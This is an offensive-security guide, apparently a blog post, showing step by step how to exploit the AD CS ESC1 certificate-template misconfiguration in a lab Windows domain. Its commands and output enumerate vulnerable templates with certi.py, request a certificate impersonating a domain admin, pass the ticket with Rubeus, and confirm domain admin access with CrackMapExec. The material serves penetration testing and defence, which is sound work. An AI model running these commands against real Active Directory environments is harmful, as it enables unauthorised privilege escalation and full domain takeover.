ESC1
ESC1 - Abuse Active Directory Certificate Services.
This is a little guide on abusing Active Directory Certificate Services (AD CS) with practical examples.
PLEASE NOTE: Check if Certipy is an option for you since this is easier to use in general.
Cheatsheet about the different AD-CS’s ESC presented by SpecterOps
Install Certi
Please install Certi
Checking vulnerable templates
You want to look at a certificate with the msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT
flag set. This gives the option to set an alternative name for the certificate AKA impersonating any user. Also the ‘Enrollment Rights’ for your current user must be available, for example Domain Users
or the membership of your current user specifically.
Note: if your current user has ‘Write Property’ rights, it is possible to give the ‘Enrollment Rights’ to yourself.
$ certi.py list 'offsec.nl/johndo-lowpriv' --dc-ip DC01PKI.offsec.nl --vuln --enable
Password:
[*] Templates
Name: User
Schema Version: 1
Enroll Services: offsec-DC01PKI-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
msPKI-Certificate-Name-Flag: (0x-5a000000) SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[...]
Name: Administrator
Schema Version: 1
Enroll Services: offsec-DC01PKI-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
msPKI-Certificate-Name-Flag: (0x-5a000000) SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[...]
Name: Machine
Schema Version: 1
Enroll Services: offsec-DC01PKI-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
msPKI-Certificate-Name-Flag: (0x18000000) SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
[...]
Name: SubCA
Schema Version: 1
Enroll Services: offsec-DC01PKI-CA
Vulnerabilities: ESC1 - SAN Impersonation, ESC2 - Any Purpose, ESC3.2 - Use Agent Certificate
msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT
[...]
Name: UsersOffsecAD
Schema Version: 2
Enroll Services: offsec-DC01PKI-CA
Vulnerabilities: ESC1 - SAN Impersonation
msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT
msPKI-Enrollment-Flag: (0x9) INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
msPKI-RA-Signature: 0
pKIExtendedKeyUsage: Client Authentication
msPKI-Certificate-Application-Policy: Client Authentication
SD Owner: S-1-5-21-497837788-612300594-3587273769-500 offsec\Administrator
Permissions
Enrollment Permissions
Enrollment Rights
S-1-5-21-497837788-612300594-3587273769-519 offsec\Enterprise Admins
S-1-5-21-497837788-612300594-3587273769-512 offsec\Domain Admins
S-1-5-21-497837788-612300594-3587273769-513 offsec\Domain Users
Write Permissions
Write Owner
S-1-5-21-497837788-612300594-3587273769-519 offsec\Enterprise Admins
S-1-5-21-497837788-612300594-3587273769-500 offsec\Administrator
S-1-5-21-497837788-612300594-3587273769-512 offsec\Domain Admins
Write DACL
S-1-5-21-497837788-612300594-3587273769-519 offsec\Enterprise Admins
S-1-5-21-497837788-612300594-3587273769-500 offsec\Administrator
S-1-5-21-497837788-612300594-3587273769-512 offsec\Domain Admins
Write Property
S-1-5-21-497837788-612300594-3587273769-519 offsec\Enterprise Admins
S-1-5-21-497837788-612300594-3587273769-500 offsec\Administrator
S-1-5-21-497837788-612300594-3587273769-512 offsec\Domain Admins
S-1-5-21-497837788-612300594-3587273769-513 offsec\Domain Users
15:30:21 in certi on main took 5s
Exploiting the configuration
Getting TGT ticket
getTGT.py 'offsec.nl/johndo-lowpriv:Welkom1234'
Make the ticket available for the current session.
export KRB5CCNAME=johndo-lowpriv.ccache
Requesting certificate with alternative name
Parameters:
offsec-DC01PKI-CA
- is found in the templateEnroll Services
field-k
- to use kerberos authentication-n
- ’no-pass’ for use with-k
--alt-name
- the user you want to impersonate, this will likely be a ‘Domain Admin’ or equal--template
- the vulnerable template name
$ python3 certi.py req 'offsec.nl/johndo-lowpriv@DC01PKI.offsec.nl' offsec-DC01PKI-CA -k -n --alt-name johnDomainAdmin --template UsersOffsecAD
[*] Service: offsec-DC01PKI-CA
[*] Template: UsersOffsecAD
[*] Username: johndo-lowpriv
[*] Alternative Name: johnDomainAdmin
[*] Response: 0x3 Issued
[*] Cert subject: CN=johndo-lowpriv
[*] Cert issuer: CN=offsec-DC01PKI-CA,DC=offsec,DC=local
[*] Cert Serial: 1300000820BF3CEC69D8FEB673000200000820
[*] Cert Extended Key Usage: Client Authentication
[+] Cert Altname: johnDomainAdmin@offsec.nl
[*] Saving certificate in johnDomainAdmin@offsec.nl.pfx (password: admin)
Requesting TGT for alternative user
Move the .pfx
to a Windows machine and start PowerShell for Rubeus.exe
.
Z:\Rubeus.exe asktgt /domain:offsec.nl /dc:DC01PKI.offsec.nl /user:johnDomainAdmin /certificate:Z:\johnDomainAdmin@offsec.nl.pfx /password:admin /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=johndo-lowpriv
[*] Building AS-REQ (w/ PKINIT preauth) for: 'offsec.nl\johnDomainAdmin'
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGPDCCBjig[REDACTED]FuZC5sb2NhbA==
[+] Ticket successfully imported!
ServiceName : krbtgt/offsec.nl
ServiceRealm : offsec.nl
UserName : johnDomainAdmin
UserRealm : offsec.nl
StartTime : 1/19/2022 6:45:25 AM
EndTime : 1/19/2022 4:45:25 PM
RenewTill : 1/26/2022 6:45:25 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : h85ETS[REDACTED]Za+4GEw==
ASREP (key) : AFC858FA[REDACTED]49D1DE
With klist
you can check the requested ticket is available.
PS C:\Windows\System32\WindowsPowerShell\v1.0> klist
Current LogonId is 0:0x58f55
Cached Tickets: (1)
#0> Client: johnDomainAdmin @ offsec.nl
Server: krbtgt/offsec.nl @ offsec.nl
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 1/19/2022 6:45:25 (local)
End Time: 1/19/2022 16:45:25 (local)
Renew Time: 1/26/2022 6:45:25 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
Verify the requested ticket is usable
PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami
offsec\johndo-lowpriv
PS Z:\> dir \\DC01PKI.offsec.nl\c$
Directory: \\DC01PKI.offsec.nl\c$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/11/2019 12:08 AM PerfLogs
d-r--- 1/11/2022 1:28 AM Program Files
d----- 1/11/2022 1:29 AM Program Files (x86)
d-r--- 1/18/2022 12:44 AM Users
d----- 1/19/2022 6:25 AM Windows
Convert the ticket from base to file
[IO.File]::WriteAllBytes("Z:\johnDomainAdmin.kirbi", [Convert]::FromBase64String("doIGPDCCBjig[REDACTED]FuZC5sb2NhbA=="))
Convert .kirbi to .ccache
Use ticket_converter.
python3 ticket_converter.py johnDomainAdmin.kirbi johnDomainAdmin.ccache
Converting kirbi => ccache
Make the .ccache
available for Kerberos authentication.
export KRB5CCNAME=admin.ccache
CrackMapExec
$ cme smb DC01PKI.offsec.nl --use-kcache
SMB DC01PKI.offsec.nl 445 DC01PKI [*] Windows Server 2019 Standard 17763 x64 (name:DC01PKI) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB DC01PKI.offsec.nl 445 DC01PKI [+] offsec.nl\johnDomainAdmin (Pwn3d!)